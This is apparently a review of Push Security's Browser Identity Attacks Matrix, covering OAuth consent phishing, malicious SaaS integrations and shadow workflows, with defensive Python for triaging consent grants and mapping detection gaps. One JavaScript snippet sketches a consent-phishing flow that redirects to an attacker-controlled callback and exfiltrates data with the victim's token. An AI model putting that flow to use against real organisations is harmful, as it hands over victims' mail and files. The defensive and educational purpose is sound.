
Inside the Browser Identity Attacks Matrix: A New Framework for SaaS Security


Hook

Your firewall, EDR, and network monitoring won't catch the next generation of attacks—because they're not going through your network at all. Welcome to networkless attacks.

Context

Traditional security architectures assume a clear perimeter: attackers come through the network, exploit endpoints, and move laterally through infrastructure you control. But the shift to SaaS has fundamentally broken this model. When your employees authenticate to Salesforce, Google Workspace, or GitHub from coffee shops, home networks, or personal devices, the corporate network isn't even in the picture. OAuth tokens flow directly between browsers and cloud providers. SAML assertions authenticate users without touching your infrastructure. Browser sessions persist across networks and devices.

This reality creates a massive blind spot. Push Security's Browser Identity Attacks Matrix emerged from this gap—a comprehensive framework documenting how adversaries exploit browser sessions, identity protocols, and SaaS platforms themselves. Presented at Microsoft BlueHat and inspired by MITRE ATT&CK's structure, the matrix catalogs techniques that security teams trained on network defense often miss entirely. It's not just theoretical: these are attacks happening in production environments, bypassing millions of dollars in traditional security tooling.

Technical Insight

The matrix organizes attacks across familiar MITRE ATT&CK stages—Reconnaissance, Initial Access, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, and Impact—but the techniques themselves look nothing like traditional network attacks.

Consider the 'OAuth Consent Phishing' technique under Initial Access. Traditional phishing tries to steal credentials, but OAuth consent attacks are more elegant. An attacker creates a malicious application and registers it with a legitimate OAuth provider (Azure AD, Google, Okta). When a victim clicks a crafted link, they see a real OAuth consent screen from their actual identity provider asking for permissions like 'Read your email' or 'Access your files.' The application name might be '0ffice 365 Document Viewer' or something similarly deceptive. The user grants consent, and the attacker receives a valid OAuth token: no credentials stolen, no malware installed, and no traffic on the corporate network to detect. Here's what the attack flow looks like:

```javascript
// Attacker's malicious OAuth application redirect
const maliciousAuthUrl =
  'https://login.microsoftonline.com/common/oauth2/v2.0/authorize?' +
  'client_id=<attacker-controlled-app-id>' +
  '&response_type=code' +
  '&redirect_uri=https://attacker-controlled.com/callback' +
  '&scope=Mail.Read Files.ReadWrite.All' +
  '&state=phishing_campaign_123';

// Victim clicks link, sees legitimate Microsoft login page
// After consent, attacker receives valid token
app.get('/callback', async (req, res) => {
  const authCode = req.query.code;
  const tokenResponse = await exchangeCodeForToken(authCode);
  // tokenResponse.access_token is now valid for victim's account
  // No credentials stolen, no malware, pure OAuth abuse
  await exfiltrateData(tokenResponse.access_token);
});
```
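A defender-side counterpart to the flow above, added here as an example and not code from Push Security's matrix or the original article: it triages constructed consent-grant audit records for the signals this technique leaves behind (digit-homoglyph app names like '0ffice', broad Mail/Files scopes, unverified publishers). The record fields, brand list and homoglyph table are assumptions made for the example.

```python
import re
from dataclasses import dataclass

# Scopes granting broad mailbox or file access; an app asking for these at
# first consent deserves review regardless of who published it.
HIGH_RISK_SCOPES = {"Mail.Read", "Mail.ReadWrite", "Files.ReadWrite.All",
                    "Files.Read.All", "Sites.ReadWrite.All"}
# Brand words an attacker is likely to imitate in the app display name.
BRANDS = ("office", "microsoft", "sharepoint", "onedrive", "google drive")
# Digit-for-letter substitutions seen in lookalike names such as "0ffice".
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "4": "a"})

@dataclass(frozen=True)
class ConsentEvent:
    """Constructed shape of an 'application consent granted' audit record."""
    app_name: str
    scopes: str              # space-separated, as in the OAuth scope parameter
    publisher_verified: bool

def normalize(name: str) -> str:
    """Lower-case and undo digit homoglyphs so '0ffice' compares as 'office'."""
    return re.sub(r"\s+", " ", name.lower().translate(HOMOGLYPHS)).strip()

def assess(event: ConsentEvent) -> list[str]:
    """Return the reasons a consent grant looks like consent phishing."""
    reasons = []
    risky = sorted(set(event.scopes.split()) & HIGH_RISK_SCOPES)
    if risky:
        reasons.append("high-risk scopes: " + ", ".join(risky))
    lowered, normalized = event.app_name.lower(), normalize(event.app_name)
    if any(b in normalized and b not in lowered for b in BRANDS):
        reasons.append("homoglyph brand name: " + event.app_name)
    elif any(b in lowered for b in BRANDS) and not event.publisher_verified:
        reasons.append("brand name used by unverified publisher")
    if risky and not event.publisher_verified:
        reasons.append("broad scopes granted to unverified publisher")
    return reasons

def triage(events: list[ConsentEvent]) -> dict[str, list[str]]:
    """Map each suspicious app name to its findings; clean grants are omitted."""
    return {e.app_name: r for e in events if (r := assess(e))}

# Constructed sample grants: one mirrors the article's '0ffice 365' lure, the
# other is an ordinary verified app asking only for basic profile access.
SAMPLE_EVENTS = [
    ConsentEvent("0ffice 365 Document Viewer", "Mail.Read Files.ReadWrite.All", False),
    ConsentEvent("Zoom", "User.Read", True),
]
```

Running `triage(SAMPLE_EVENTS)` flags only the lookalike app, with all three reasons attached.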

The matrix excels at documenting these multi-stage attacks. For persistence, it covers techniques like 'Evil Twin Integrations'—where attackers create SaaS-to-SaaS integrations that look legitimate but exfiltrate data continuously. In Salesforce, for instance, an attacker with initial access might create a Connected App that syncs 'customer data for analytics' but actually feeds it to attacker infrastructure. The integration persists even if the initial access vector is discovered and remediated.

The 'Shadow Workflow' technique under Defense Evasion is particularly insidious. Modern SaaS platforms like Slack, Microsoft Power Automate, or Zapier allow users to create workflows that move data between systems. An attacker creates a workflow that appears benign—maybe 'Archive important messages to Google Drive'—but configures the destination to be an attacker-controlled Drive account. Security teams reviewing OAuth permissions might see 'Google Drive integration' and consider it normal business activity.

What makes the matrix architecturally valuable is its mapping of detection gaps. Each technique documents what traditional controls miss:

## Detection Challenges
- **Network security**: No malicious network traffic to corporate resources
- **Endpoint security**: Attacks execute entirely in browser, no malware
- **IAM logs**: OAuth consent appears as legitimate user authorization
- **CASB**: May see API calls but they're from 'authorized' applications

The repository structure mirrors MITRE ATT&CK with Markdown files for each technique containing: description, real-world examples, prerequisites, procedure, detection opportunities, and mitigation strategies. This standardization makes it possible to build security programs around the matrix—mapping your detective controls to specific techniques, identifying coverage gaps, and prioritizing investments.

For red teams, the matrix provides a structured approach to SaaS penetration testing. Instead of ad-hoc testing, you can systematically evaluate an organization's defenses across all documented techniques. For blue teams, it's a gap analysis framework: which of these 40+ techniques could we actually detect? Which could we prevent? Where are we completely blind?
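As an added example, not code from the matrix repository: a small gap-analysis script that parses two constructed technique write-ups in the section layout described above, pulls out each technique's detection data sources, and rates coverage against the telemetry an organization actually collects. The heading names, the "Tactic:" line and the "Data source:" bullet tag are assumptions about the file format, not the repository's own.

```python
import re
from dataclasses import dataclass
# Constructed write-ups in the per-technique Markdown layout the article
# describes. The heading names, the "Tactic:" line and the "Data source:"
# bullet tag are assumptions for this example, not the repository's format.
TECHNIQUES = {
    "oauth-consent-phishing.md": """# OAuth Consent Phishing
Tactic: Initial Access
## Description
Victim grants a malicious app delegated access via a real consent screen.
## Detection opportunities
- Data source: identity-provider consent audit log
- Data source: app registration inventory
""",
    "shadow-workflow.md": """# Shadow Workflow
Tactic: Defense Evasion
## Description
A benign-looking automation forwards data to an attacker-controlled store.
## Detection opportunities
- Data source: workflow platform audit log
- Data source: SaaS API egress logs
""",
}
# Body of the "## Detection opportunities" section up to the next heading/EOF.
DETECTION = re.compile(r"^## Detection opportunities\n(.*?)(?=^## |\Z)", re.M | re.S)

@dataclass(frozen=True)
class Technique:
    name: str
    tactic: str
    data_sources: frozenset[str]

def parse_technique(markdown: str) -> Technique:
    """Extract title, tactic and the detection data sources from one write-up."""
    name = re.search(r"^# (.+)$", markdown, re.M).group(1)
    tactic = re.search(r"^Tactic: (.+)$", markdown, re.M).group(1)
    section = DETECTION.search(markdown)
    bullets = re.findall(r"^- Data source: (.+)$", section.group(1), re.M) if section else []
    return Technique(name, tactic, frozenset(b.strip() for b in bullets))

def coverage(techniques, available: set[str]) -> dict[str, str]:
    """Rate each technique covered, partial or blind for the telemetry you have."""
    report = {}
    for t in techniques:
        hits = len(t.data_sources & available)
        report[t.name] = ("blind" if hits == 0 else
                          "covered" if hits == len(t.data_sources) else "partial")
    return report
TECHNIQUE_OBJECTS = [parse_technique(md) for md in TECHNIQUES.values()]
```

Pointing `coverage` at the real repository means swapping the constructed strings for the contents of its technique files and adjusting the regexes to whatever section names it actually uses.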

Gotcha

The matrix is explicitly 'work in progress,' and you'll encounter incomplete sections, missing references, and techniques that need more real-world examples. Some techniques are well-documented with detailed procedures, while others are stubs waiting for expansion. This inconsistency means you can't rely on it as a complete reference yet—you'll need to supplement with your own research for certain attack vectors.

More fundamentally, this is a documentation project, not a toolkit. If you're expecting ready-to-use exploits or automated attack tools, you'll be disappointed. The matrix tells you how OAuth consent phishing works conceptually, but you'll need to build (or find) your own tooling to execute it. For practitioners wanting to test these techniques against their own environments, you'll need to combine this matrix with repositories like AADInternals for Azure AD attacks, or develop custom tooling based on the documented procedures. The value is in the framework and knowledge, not in operational tooling.

Verdict

Use if: You're building or evaluating security programs for SaaS-heavy organizations and need to understand attack vectors that traditional network/endpoint security completely misses. This is essential reading for security architects designing detection strategies for OAuth abuse, SAML attacks, and browser-based threats. Red teams will find it valuable for structuring SaaS penetration tests beyond the typical 'try to phish credentials' approach, while blue teams can use it to identify blind spots in their current security stack. It's particularly relevant if you're evaluating CASB, SSPM, or browser security solutions and need to understand what threats they should actually address.

Skip if: You need production-ready offensive tools rather than technique documentation, or if your threat model centers on traditional infrastructure attacks. Organizations still primarily using on-premises applications won't find as much immediate value here. Also skip if you want a finished, comprehensive reference—the work-in-progress nature means you'll encounter gaps that require independent research to fill.
